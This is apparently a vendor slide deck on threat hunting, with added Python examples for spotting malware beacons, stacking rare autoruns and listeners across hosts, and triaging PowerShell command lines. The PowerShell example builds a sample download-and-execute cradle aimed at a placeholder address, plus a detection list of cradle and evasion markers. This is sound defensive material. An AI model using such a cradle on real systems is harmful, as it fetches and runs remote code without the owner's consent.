Page 1: Hunting Before a Known Incident

Mark Dufresne
Director of Malware Research and Threat Intelligence
Endgame

Page 2: Agenda

• Who am I?
• Assume you are compromised
  – Defenses fail. All the time.
• Be proactive, think offense: hunt!
  – What is hunt
  – Hunt techniques
  – Benefits of hunt
• Hunt vs. traditional IR
• Challenges of hunting and how to overcome them
• Hunting best practices

Page 3: About Me

• Previous experience
  – 13 years at NSA: a mix of offense and defense
• Currently
  – Director of Malware Research and Threat Intelligence at Endgame

Page 4: Today’s Reality

The cycle isn’t working: prevention, detection, triage, response

• Prevention is important, but it will be bypassed
• Search- and signature-based detection is always behind the attacker
• Often, the first notification of a breach comes from an external party
• Often, additional adversaries are already active while a known incident is being closed

Page 5: Why Does Search/Signature Detection Fail?

• On your network
  – Encryption
  – Cloud services used for staging, C2 and exfiltration blend in with legitimate traffic
  – Tailored and/or ephemeral attack infrastructure
• On your endpoints
  – Polymorphism
  – Malware customization and diversification
  – Use of legitimate credentials and admin tools; malware only as a last resort
• Assume compromise!
  – Someone else’s IOCs might not help you
  – Signatures won’t find everything: they won’t find what hasn’t been seen before

Attacks are changing

Page 6: Be Proactive, Think Offense

• Adversaries are eating your lunch
• You can’t afford to wait
• Offensive, proactive discovery must be the response
  – Search is necessary but insufficient
  – Look for techniques used by attackers
  – Look for patterns in the right data

Hunt within your networks, a.k.a. continuous IR

Page 7: Hunting

• Hunting is the proactive, stealthy, and methodical pursuit and eviction of adversaries inside your network without relying on IOCs
  – Detect and eliminate known as well as never-before-seen adversaries
• Adversaries operate on your systems, and they leave a trail
  – Understand what actions they take in the OS: chokepoints
  – Understand the breadcrumbs they leave on and across systems: patterns and anomalies
• Gain the right visibility, collect the right data, analyze, detect, and respond
  – Lock down systems while you’re doing it
  – Be stealthy

Page 8: Common Hunt Methods and Techniques

• Indicator of Compromise (IOC)
• Network
• Endpoint
• Manual vs. scheduled vs. continuous
• Outliers/oddities vs. anomaly detection

Page 9: Indicator Hunting? (Searching)

• What’s search good for?
  – Reacting to an external notification
  – Finding well-known campaigns
  – Consistently finding unsophisticated threats
  – Pivoting on IOCs you find in your own network
  – Determining the extent of an incident
• Your hunt platform needs to facilitate search
  – Search is today’s security muscle memory
  – But a hunter needs to do more

If you know what you are looking for, it is not hunt, it is search.

Page 10: Hunting on the Network

• Network data is noisier than host data
  – But it’s still valuable
  – Best if you can tie it to the owning process
• Listeners
  – What ports are listening on only a few systems?
  – What processes have listening sockets on only a few systems?
• DNS resolutions
  – What looks like it could be a DGA domain?
  – What looks like it’s trying to masquerade as a real site?
• Beaconing
  – What connections look like they could be malware beacons?
• Choose where to focus the hunt, then collect, analyze, detect, respond
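The beaconing question above, worked as an added example (this is not code from the slides or from Endgame's tooling): a small Python routine groups connection records by source host, destination and port, then flags pairs whose inter-connection intervals are both numerous and regular, measured as the coefficient of variation (standard deviation divided by the mean) of the gaps. The hosts, addresses and timestamps are constructed sample data.

```python
"""Beacon hunting over connection records.

Groups connections by (source host, destination, port) and flags pairs whose
inter-connection intervals are both numerous and regular (low coefficient of
variation). Added example with constructed data; not the slides' own code.
"""
from collections import defaultdict
from statistics import mean, pstdev

BASE = 1_700_000_000  # arbitrary epoch start for the constructed sample

# Constructed sample: (epoch seconds, source host, destination, destination port).
# ws-0412 talks to 203.0.113.5 roughly every 300 s with a few seconds of jitter;
# ws-0207 browses 198.51.100.20 at irregular times and touches 192.0.2.9 only three times.
BEACON_OFFSETS = [0, 301, 599, 902, 1200, 1498, 1801, 2100, 2399, 2702, 3000, 3298]
BROWSE_OFFSETS = [0, 15, 400, 405, 1700, 1750, 2200, 3100, 3105]
SAMPLE_CONNECTIONS = (
    [(BASE + o, "ws-0412", "203.0.113.5", 443) for o in BEACON_OFFSETS]
    + [(BASE + o, "ws-0207", "198.51.100.20", 443) for o in BROWSE_OFFSETS]
    + [(BASE + o, "ws-0207", "192.0.2.9", 80) for o in (10, 700, 1400)]
)


def interval_stats(timestamps):
    """Mean and coefficient of variation (stdev / mean) of the gaps between sorted timestamps."""
    ordered = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    if not gaps:
        return 0.0, float("inf")          # a single connection has no interval to measure
    avg = mean(gaps)
    cv = pstdev(gaps) / avg if avg > 0 else float("inf")
    return avg, cv


def find_beacons(records, min_count=8, max_cv=0.15):
    """Return (src, dst, port) pairs with at least min_count connections whose gaps vary
    by no more than max_cv of the mean gap, most regular pair first."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in records:
        by_pair[(src, dst, port)].append(ts)

    hits = []
    for (src, dst, port), times in by_pair.items():
        if len(times) < min_count:        # too few samples to judge regularity
            continue
        avg, cv = interval_stats(times)
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "port": port, "count": len(times),
                         "interval_s": round(avg, 1), "cv": round(cv, 3)})
    return sorted(hits, key=lambda h: h["cv"])


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_CONNECTIONS):
        print(f"{hit['src']} -> {hit['dst']}:{hit['port']} "
              f"{hit['count']} connections every ~{hit['interval_s']} s (cv={hit['cv']})")
```

Regularity alone is not malice: update checkers, NTP and monitoring agents beacon too, so the hits are a review queue, and the first triage step is to tie each hit to the owning process, as the slide recommends, and allowlist the known-good pairs. The min_count threshold matters as much as max_cv: the three connections to 192.0.2.9 in the sample look perfectly regular and would be flagged at min_count=3, but two intervals are not evidence of anything. Real implants add jitter and randomized sleep, so max_cv is a tuning knob to revisit, not a constant.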


Page 11: Hunting on Endpoints

• Autoruns locations
  – What’s persisting on only a few hosts?
  – What’s executing out of a strange location?
• Running processes
  – Which binary has a hash mismatch across hosts?
  – Which process has a loaded module not present on other systems?
• Execution artifacts
  – What strange PowerShell commands have been run?
  – Where do I see unusual remote process executions?
• Many other possibilities
• Again: choose, collect, analyze, detect, respond
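The "only a few hosts" questions on this slide (autoruns, loaded modules, hash mismatches) and on the network slide (listening ports and processes) all rest on one technique, stacking or least-frequency analysis: invert per-host inventories into item -> hosts and look at the short end of the distribution. The following Python is an added example of it, not code from the slides; the hosts, paths, ports and hash values are constructed placeholders.

```python
"""Stacking (least-frequency analysis) across hosts.

Inverts per-host inventories of some artifact into artifact -> hosts and
reports what is present on only a few hosts, plus system binaries whose hash
differs between hosts. Added example with constructed data; not the slides' code.
"""
from collections import defaultdict

# --- Constructed sample inventories (hypothetical hosts, paths, ports, hashes) ---
HOSTS = ("ws-0101", "ws-0102", "ws-0103", "ws-0104", "ws-0105")

COMMON_AUTORUNS = {r"C:\Windows\System32\svchost.exe", r"C:\Program Files\Vendor\agent.exe"}
AUTORUNS = {host: set(COMMON_AUTORUNS) for host in HOSTS}
AUTORUNS["ws-0103"].add(r"C:\Users\Public\Libraries\update.exe")   # persists on one host only

COMMON_LISTENERS = {(135, "svchost.exe"), (445, "System")}        # (port, owning process)
LISTENERS = {host: set(COMMON_LISTENERS) for host in HOSTS}
LISTENERS["ws-0103"].add((4444, "notepad.exe"))                    # an editor has no business listening

RUNDLL = r"C:\Windows\System32\rundll32.exe"
FILE_HASHES = {host: {RUNDLL: "sha256:placeholder-A"} for host in HOSTS}   # host -> {path: digest}
FILE_HASHES["ws-0103"][RUNDLL] = "sha256:placeholder-B"                     # same path, different bytes


def stack(inventory):
    """Invert host -> {items} into item -> sorted list of hosts that have it."""
    hosts_by_item = defaultdict(set)
    for host, items in inventory.items():
        for item in items:
            hosts_by_item[item].add(host)
    return {item: sorted(hosts) for item, hosts in hosts_by_item.items()}


def rare_items(inventory, max_hosts=1):
    """Items seen on at most max_hosts hosts: the outliers a hunter reviews first."""
    return {item: hosts for item, hosts in stack(inventory).items() if len(hosts) <= max_hosts}


def hash_mismatches(file_hashes):
    """Paths whose hash differs across hosts, as {path: {minority_digest: [hosts]}}.
    Assumes the most common digest is the legitimate one, which only holds when
    the hosts share an OS build, so compare within a build, not across the fleet."""
    by_path = defaultdict(lambda: defaultdict(set))
    for host, files in file_hashes.items():
        for path, digest in files.items():
            by_path[path][digest].add(host)
    findings = {}
    for path, digests in by_path.items():
        if len(digests) < 2:
            continue
        majority = max(digests, key=lambda d: len(digests[d]))
        findings[path] = {d: sorted(h) for d, h in digests.items() if d != majority}
    return findings


if __name__ == "__main__":
    print("rare autoruns:", rare_items(AUTORUNS))
    print("rare listeners:", rare_items(LISTENERS))
    print("hash mismatches:", hash_mismatches(FILE_HASHES))
```

The same inventory shape (host -> set of items) carries loaded modules, scheduled tasks, services or WMI subscriptions without changing the functions. Rare is a review queue, not a verdict: a one-off admin tool is rare too, so keep a baseline of reviewed items and diff against it so each run shows only what is new, and in a fleet of thousands raise max_hosts to a small percentage rather than an absolute count.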

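The "strange PowerShell commands" question, worked as an added example (not the slides' or Endgame's code): decode the -EncodedCommand argument, which powershell.exe expects as base64 of UTF-16LE text, and score the visible command line plus the decoded payload against a short list of download-cradle and evasion markers. The command lines are constructed; the marker list is a starting point, not a catalogue.

```python
"""Hunting PowerShell execution artifacts: decode -EncodedCommand payloads and
score command lines against cradle/evasion markers. Added example over
constructed command lines; not the slides' own tooling.
"""
import base64
import re

# -EncodedCommand and the prefixes powershell.exe accepts for it, followed by a base64 blob
ENCODED_RE = r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})"

# Markers a hunter looks for (regexes, matched case-insensitively). Starting point, not a catalogue.
MARKERS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-no(?:p|profile)\b",
    "bypass_policy": r"-ex(?:ecutionpolicy)?\s+bypass",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient",
    "invoke_expression": r"\biex\b|invoke-expression",
    "base64_decode": r"frombase64string",
}


def encode_command(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it (UTF-16LE, base64).
    Used here only to construct realistic sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid UTF-16LE base64."""
    match = re.search(ENCODED_RE, cmdline, re.IGNORECASE)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def triage(cmdline):
    """Decode, then collect markers from the visible command line (blob removed) and the payload."""
    decoded = decode_encoded_command(cmdline)
    visible = re.sub(ENCODED_RE, "-EncodedCommand <blob>", cmdline, flags=re.IGNORECASE)
    text = visible + "\n" + (decoded or "")
    hits = {name for name, pat in MARKERS.items() if re.search(pat, text, re.IGNORECASE)}
    if decoded is not None:
        hits.add("encoded_command")
    return {"cmdline": cmdline, "decoded": decoded, "markers": sorted(hits)}


def rank(cmdlines):
    """Most marker hits first; ties keep input order."""
    return sorted((triage(c) for c in cmdlines), key=lambda r: -len(r["markers"]))


# Constructed sample command lines (hypothetical paths; 192.0.2.10 is a documentation address)
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp",
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
]


if __name__ == "__main__":
    for result in rank(SAMPLE_CMDLINES):
        print(len(result["markers"]), result["markers"], result["decoded"] or result["cmdline"])
```

Case-insensitive matching matters because PowerShell parameters accept any casing and any unambiguous prefix (-enc, -ec and even -e all mean -EncodedCommand). The benign -NoProfile listing and the policy-bypassing backup script each score a single marker, which is why the ranking counts markers rather than treating any one as malicious. Combine this with stacking across hosts so a command line seen on one workstation outranks the same scheduled task running on hundreds.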

Page 12: Benefits of Hunt

• Reduced dwell time before discovery, and reduced costs
  – Shorter dwell time usually means reduced incident complexity
  – Shorter dwell time usually means less loss or damage
• Break the cycle of reactivity
• Build new security muscle memory
  – Through continuous hunting, the team gains the ability to see and react to patterns and anomalies

“Organizations that proactively work to discover incidents — ‘hunt’ for them — have a better chance of finding them and effectively reducing their impact.” Gartner, 2016

Page 13: Hunt and Incident Response

• Very similar methods and skills required
• Similar tools and techniques
• Different starting point
  – Hunt: assume breach and find it
  – IR: known (or suspected) penetration
• Steps after discovery are remarkably similar
• Don’t wait for the incident. Go find it.
  – IR teams can be the hunters
  – So, consider hunting


Page 14: Hunt Challenges and Solutions

Challenge                                        Solution
Lack of resources                                Start with free tools (“Hunting on the Cheap”)
Difficulty hiring skilled hunters; lack of time  Automate analysis; generate detections based on hunt techniques
Drowning in data                                 Data science and machine learning; start small and limited in scope
Tipping off the adversary                        Stealth tools and techniques

To hunt effectively, consistently, and at scale in any organization, you need a platform that augments and assists your team

Page 15: Endgame Advantages

• Multi-Mode Operation: built-in options for discovery, on-demand deployment, and persistence
• Stealth: prevents adversary disruption and evasion
• IOC-Independent Detection: detects never-before-seen and unique attacks
• Tailored & Surgical Response: thread-level response prevents disruption of normal business
• Automation: empowers Tier 1 & 2 analysts and minimizes time to remediation
• Intelligent Collection: real-time, automated answers to critical questions

Page 16: Summary

• The current detection and IR cycle doesn’t work
• Transform the IR cycle into a hunt cycle
• Start hunting now
• Automate, automate, automate

Stop by the Endgame table for a demo!